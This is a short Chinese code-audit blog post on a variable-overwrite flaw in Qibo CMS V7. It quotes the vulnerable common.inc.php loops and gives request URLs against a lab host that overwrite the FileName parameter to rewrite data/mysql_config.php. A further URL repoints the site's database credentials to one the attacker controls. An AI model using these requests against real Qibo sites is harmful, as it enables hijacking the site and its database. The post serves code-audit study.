php代码审计【23】齐博CMS通杀漏洞漏洞

一、安装好齐博CMS_V7,安装完成后如下:

二、分析代码

common.inc.php

foreach($_COOKIE AS $_key=>$_value){
	unset($$_key);
}
foreach($_POST AS $_key=>$_value){
	!ereg("^\_[A-Z]+",$_key) && $$_key=$_POST[$_key];
}
foreach($_GET AS $_key=>$_value){
	!ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];
}

http://192.168.189.129/qibo/do/fujsarticle.php?type=hot 

 http://192.168.189.129/qibo/do/fujsarticle.php?type=hot&FileName=xxxx.php

重新给filename赋值:,生成新的xxxx.php

这路的思路,就是将原来的数据库文件重新滞空,然后进行

http://192.168.189.129/qibo/do/fujsarticle.php?type=hot&FileName=../data/mysql_config.php(FileName区分大小写)

 

 访问首页:

重新赋值:(数据库换成自己的数据库地址)

http://192.168.189.129/qibo/index.php?dbhost=localhost&dbuser=root&dbpw=root&dbname=qibo_v7&pre=qb_

 

总结:总体思路,利用变量覆盖来重写数据库文件,然后对数据库文件重写连接服务器,进行代码利用。 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值